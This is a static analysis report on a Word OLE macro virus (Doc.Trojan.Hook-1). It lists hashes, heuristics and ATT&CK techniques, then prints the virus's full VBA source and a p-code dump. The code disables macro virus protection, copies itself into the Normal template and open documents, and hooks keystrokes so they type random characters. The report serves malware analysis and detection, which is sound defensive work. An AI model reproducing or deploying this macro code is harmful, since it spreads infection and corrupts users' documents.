Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 15118a07b42b5de5…

MALICIOUS

Office (OLE)

Size: 33.5 KB
Created: 1999-06-12 15:22:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: c8ec572c92d0fd16716d24c81a0a0b92
SHA-1: ced838b91c51897b3b2a16a0766091d6bcfc7a6c
SHA-256: 15118a07b42b5de5c44085235defed4e73ed2349e18ac417f35932391f94a1bb
Risk score: 180

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder

The sample contains VBA macros, including a Document_Open macro that runs automatically when the document is opened, which is a critical heuristic. The macro attempts to disable Word's macro virus protection and copies its own source into the Normal template and the active document. It also adds key bindings that route keystrokes to its own handler, which could be used for further obfuscation or execution. The Document_Open macro together with this code manipulation strongly suggests an attempt to establish persistence or prepare for further payload execution.

Heuristics 3

  • ClamAV: Doc.Trojan.Hook-1 (critical, CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Trojan.Hook-1
  • VBA macros detected (medium, 1 related finding, OLE_VBA_MACROS)
    Document contains VBA macro code
  • Document_Open macro (high, OLE_VBA_DOCOPEN)
    Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 4125 bytes
SHA-256: 5e7c9f1abb0e4e381595bb31d52dc8784da212631ff7de566b3fe76827046f99
Detection
ClamAV: Doc.Trojan.Hook-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
Application.EnableCancelKey = wdCancelDisabled
On Error Resume Next
Options.VirusProtection = False
Application.CommandBars("Tools").Controls(12).Visible = False

Set NT = NormalTemplate.VBProject.VBComponents(1).CodeModule
Set AD = ActiveDocument.VBProject.VBComponents(1).CodeModule
Set TD = ThisDocument.VBProject.VBComponents(1).CodeModule
VCode = TD.Lines(1, TD.CountOfLines)
NT.DeleteLines 1, NT.CountOfLines: NT.InsertLines 1, VCode
AD.DeleteLines 1, AD.CountOfLines: AD.InsertLines 1, VCode

Randomize Selection.StoryLength
If (Int(Rnd * Selection.StoryLength)) < Selection.StoryLength Then
    For i = 1 To 25
        Application.KeyBindings.Add 2, "ThisDocument.Key_Hook", 64 + i
    Next
End If
End Sub
Private Sub Document_Close()
Application.KeyBindings.ClearAll
End Sub
Private Sub Key_Hook()
System.Cursor = wdCursorIBeam
Selection.TypeText Chr(Int(Rnd * 255))
System.Cursor = wdCursorIBeam
'// Have a nice day //
'// written by  Lord Arz [TI] //
End Sub

' Processing file: /opt/analyzer/scan_staging/980122d4e714414b9669c60fa5de8371.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 5794 bytes
' Line #0:
' 	FuncDefn (Private Sub Document_Open())
' Line #1:
' 	Ld wdCancelDisabled 
' 	Ld Application 
' 	MemSt EnableCancelKey 
' Line #2:
' 	OnError (Resume Next) 
' Line #3:
' 	LitVarSpecial (False)
' 	Ld Options 
' 	MemSt VirusProtection 
' Line #4:
' 	LitVarSpecial (False)
' 	LitDI2 0x000C 
' 	LitStr 0x0005 "Tools"
' 	Ld Application 
' 	ArgsMemLd CommandBars 0x0001 
' 	ArgsMemLd Controls 0x0001 
' 	MemSt Visible 
' Line #5:
' Line #6:
' 	SetStmt 
' 	LitDI2 0x0001 
' 	Ld NormalTemplate 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	Set NT 
' Line #7:
' 	SetStmt 
' 	LitDI2 0x0001 
' 	Ld ActiveDocument 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	Set AD 
' Line #8:
' 	SetStmt 
' 	LitDI2 0x0001 
' 	Ld ThisDocument 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	Set TD 
' Line #9:
' 	LitDI2 0x0001 
' 	Ld TD 
' 	MemLd CountOfLines 
' 	Ld TD 
' 	ArgsMemLd Lines 0x0002 
' 	St VCode 
' Line #10:
' 	LitDI2 0x0001 
' 	Ld NT 
' 	MemLd CountOfLines 
' 	Ld NT 
' 	ArgsMemCall DeleteLines 0x0002 
' 	BoS 0x0000 
' 	LitDI2 0x0001 
' 	Ld VCode 
' 	Ld NT 
' 	ArgsMemCall InsertLines 0x0002 
' Line #11:
' 	LitDI2 0x0001 
' 	Ld AD 
' 	MemLd CountOfLines 
' 	Ld AD 
' 	ArgsMemCall DeleteLines 0x0002 
' 	BoS 0x0000 
' 	LitDI2 0x0001 
' 	Ld VCode 
' 	Ld AD 
' 	ArgsMemCall InsertLines 0x0002 
' Line #12:
' Line #13:
' 	Ld Selection 
' 	MemLd StoryLength 
' 	ArgsCall Read 0x0001 
' Line #14:
' 	Ld Rnd 
' 	Ld Selection 
' 	MemLd StoryLength 
' 	Mul 
' 	FnInt 
' 	Paren 
' 	Ld Selection 
' 	MemLd StoryLength 
' 	Lt 
' 	IfBlock 
' Line #15:
' 	StartForVariable 
' 	Ld i 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	LitDI2 0x0019 
' 	For 
' Line #16:
' 	LitDI2 0x0002 
' 	LitStr 0x0015 "ThisDocument.Key_Hook"
' 	LitDI2 0x0040 
' 	Ld i 
' 	Add 
' 	Ld Application 
' 	MemLd KeyBindings 
' 	ArgsMemCall Add 0x0003 
' Line #17:
' 	StartForVariable 
' 	Next 
' Line #18:
' 	EndIfBlock 
' Line #19:
' 	EndSub 
' Line #20:
' 	FuncDefn (Private Sub Document_Close())
' Line #21:
' 	Ld Application 
' 	MemLd KeyBindings 
' 	ArgsMemCall ClearAll 0x0000 
' Line #22:
' 	EndSub 
' Line #23:
' 	FuncDefn (Private Sub Key_Hook())
' Line #24:
' 	Ld wdCursorIBeam 
' 	Ld System 
' 	MemSt Cursor 
' Line #25:
' 	Ld Rnd 
' 	LitDI2 0x00FF 
' 	Mul 
' 	FnInt 
' 	ArgsLd Chr 0x0001 
' 	Ld Selection 
' 	ArgsMemCall TypeText 0x0001 
' Line #26:
' 	Ld wdCursorIBeam 
' 	Ld System 
' 	MemSt Cursor 
' Line #27:
' 	QuoteRem 0x0000 0x0015 "// Have a nice day //"
' Line #28:
' 	QuoteRem 0x0000 0x001F "// written by  Lord Arz [TI]
... (truncated)